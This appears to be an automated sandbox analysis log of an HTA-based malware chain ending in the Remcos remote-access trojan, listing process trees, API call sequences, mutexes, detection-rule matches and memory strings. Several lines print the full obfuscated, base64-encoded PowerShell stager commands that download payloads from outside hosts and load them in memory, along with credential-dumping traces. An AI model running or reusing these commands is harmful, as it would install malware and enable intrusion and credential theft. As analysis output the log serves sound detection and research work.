                        Source: Process Memory Space: CasPol.exe PID: 8136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@26/20@4/5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,16_2_00410DE1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A63F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\verynicebeautifulpictueforentirelifekidsgivenmebackwithnew[1].tiffJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GH3PRL
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ugyuheb.2lo.ps1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformationJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: CasPol.exe, CasPol.exe, 0000000F.00000002.2132674148.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: CasPol.exe, 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: CasPol.exe, 0000000D.00000002.2144064081.0000000002E0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaVirustotal: Detection: 33%
                        Source: greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaReversingLabs: Detection: 23%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1B0.tmp" "c:\Users\user\AppData\Local\Temp\1wf2prhw\CSCC38D34038713434CB5EBD437745683DE.TMP"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aacvjnbswp"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nwvgdqxnygriykln"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1B0.tmp" "c:\Users\user\AppData\Local\Temp\1wf2prhw\CSCC38D34038713434CB5EBD437745683DE.TMP"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispiculeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aacvjnbswp"Jump to behavior
